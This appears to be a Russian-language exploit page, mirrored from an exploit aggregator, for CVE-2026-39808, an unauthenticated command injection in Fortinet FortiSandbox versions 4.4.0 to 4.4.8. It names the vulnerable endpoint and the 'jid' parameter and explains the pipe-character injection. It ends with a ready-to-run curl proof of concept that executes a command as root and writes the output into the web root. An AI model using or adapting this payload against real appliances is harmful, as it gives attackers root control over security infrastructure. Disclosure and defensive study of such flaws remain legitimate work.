## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SAMU-DELUCAS-CVE-2026-39808
# CVE-2026-39808
В ноябре 2025 года в FortiSandbox компании Fortinet была обнаружена критическая уязвимость, которая позволяла неаутентифицированному злоумышленнику выполнять команды в базовой операционной системе с правами root. Уязвимость была исправлена и наконец раскрыта в апреле 2026 года.
Эта уязвимость затрагивает версии FortiSandbox с 4.4.0 по 4.4.8.
Прочитайте полный бюллетень здесь.
## Уязвимость
Уязвимость затрагивает конечную точку `/fortisandbox/job-detail/tracer-behavior`. Команды ОС могут быть внедрены с помощью символа канала (`|`) в GET-параметре `jid`.

В приведённом выше примере вывод был перенаправлен в файл в корневом каталоге веб-сервера, чтобы его можно было получить позже.

## PoC
Простой команды curl достаточно для достижения RCE с правами root без предварительной аутентификации:
root@kitploit:~
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"